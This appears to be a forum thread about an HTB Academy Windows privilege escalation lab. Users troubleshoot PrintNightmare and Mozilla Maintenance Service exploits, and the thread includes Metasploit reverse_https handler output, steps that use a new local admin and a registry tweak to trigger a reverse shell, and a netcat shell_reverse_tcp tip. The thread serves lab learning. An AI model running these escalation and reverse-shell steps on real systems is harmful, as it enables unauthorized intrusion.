HTB Academy: Windows Privilege Escalation Kernel Exploits

Hi, I am not sure what is going on in this section, Kernel Exploits in Windows Privilege Escalation.
I can obtain the hashes from the SAM database, though I can't crack them with hashcat or john.
But I can't use the PS1 script for PrintNightmare; Windows is not allowing the PS script to load,
and I am not able to get a meterpreter shell as explained. I receive a callback from the machine, but no session is opened.
Any clues or directions?
Cheers

It seems the VM was already exploited. I did a quick check and I found the user hacker.
But I was unable to load the PS script, as it says script execution has been disabled, and it was not possible to decode the dumped hashes.

I got my flag as I managed to create a new user after bypassing the PS policy, but the meterpreter session didn't work. Has anybody faced the message below?
Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.x.xx       yes       The local listener hostname
   LPORT     80               yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://10.10.xx.xx:80
[*] https://10.10.X.X:80 handling request from 10.129.43.13; (UUID: g7a8ehsz) Staging x64 payload (201308 bytes) ...
[-] Failed to load extension: No response was received to the core_loadlib request.
[*] Meterpreter session 1 opened (10.10.X.X:80 -> 127.0.0.1 ) at 2022-01-04 14:54:40 +1100

I was able to start up a meterpreter session, but after ANY command I run, it kills the connection.

Putting this up here in case someone needs it.

  1. Create the new local admin using the info provided in the module.
  2. Move on to the Mozilla service exploit and follow the instructions in the module. (Move all executables over to the machine before moving on to the next step, i.e. maintenanceservice.exe and maintenanceservice2.exe; you can go ahead and run the exploit and copy over maintenanceservice2.exe, but DO NOT start the MozillaMaintenance service just yet.)
  3. On the victim machine, start a command prompt using runas /user:"TheNewAdminYouCreatedInFirstStep" cmd.exe
  4. This will open up a new cmd prompt under the new local admin account you created.
  5. Type regedit
  6. In regedit go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MozillaMaintenance
  7. Create a new DWORD (32-bit) value and name it ServicePipeTimeout.
  8. Set the ServicePipeTimeout value to 360000.
  9. Close regedit.
  10. On the attack machine start your metasploit console with the resource file provided.
  11. On the victim machine, under the same local admin cmd prompt, run the command: sc start MozillaMaintenance
  12. Check on your attack machine for the callback.
  13. You should have a steady connection that does not drop out and allow you to download the flag.

I hope this helps someone as this is how I got it to work for me.

For anyone having issues with the meterpreter shell, use windows/x64/shell_reverse_tcp when creating the payload and set up a nc listener instead of using meterpreter.


I UNDERSTAND THAT IT IS NOT THE MOST APPROPRIATE WAY, BUT TO GET THE FLAG THE SERVICE IN METASPLOIT DIES AFTER A FEW SECONDS, SO YOU HAVE TO BE FAST. JUST START THE REVERSE SHELL IN MSF

shell
type c:\Users\Administrator\flag.txt
AND YOU WILL GET THE FLAG

I love you